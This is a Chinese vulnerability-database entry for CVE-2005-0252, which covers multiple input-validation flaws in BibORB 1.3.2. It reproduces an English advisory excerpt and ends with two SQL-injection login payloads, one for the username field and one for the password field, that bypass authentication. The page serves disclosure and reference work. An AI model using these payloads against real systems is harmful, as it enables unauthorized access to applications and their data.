BibORB多个输入验证漏洞

BibORB多个输入验证漏洞

漏洞ID 1108463 漏洞类型 SQL注入
发布时间 2005-02-17 更新时间 2005-10-20
图片[1]-BibORB多个输入验证漏洞-安全小百科CVE编号 CVE-2005-0252
图片[2]-BibORB多个输入验证漏洞-安全小百科CNNVD-ID CNNVD-200505-190
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-190
|漏洞详情
BibORB1.3.2以及可能较早的版本中存在SQL注入漏洞,允许远程攻击者通过(1)Username或(2)Password来执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/12583/info
   
   
BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks.
   
These vulnerabilities are reported to affect BibORB version 1.3.2 and all previous versions. 

When logging in, use the following username and password:

Username: x' or 1=1 or login='x
Password: x') or 1=1 or password=md5('x
|参考资料

来源:BID
名称:12583
链接:http://www.securityfocus.com/bid/12583
来源:FULLDISC
名称:20050217Advisory:MultipleVulnerabilitiesinBibORB
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=110864983905770&w;=2
来源:BUGTRAQ
名称:20050217Advisory:MultipleVulnerabilitiesinBibORB
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110868948719773&w;=2

相关推荐: War-FTPd 1.6x CWD/MKD DoS Vulnerability

War-FTPd 1.6x CWD/MKD DoS Vulnerability 漏洞ID 1104395 漏洞类型 Boundary Condition Error 发布时间 2000-02-03 更新时间 2000-02-03 CVE编号 N/A CNNVD…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享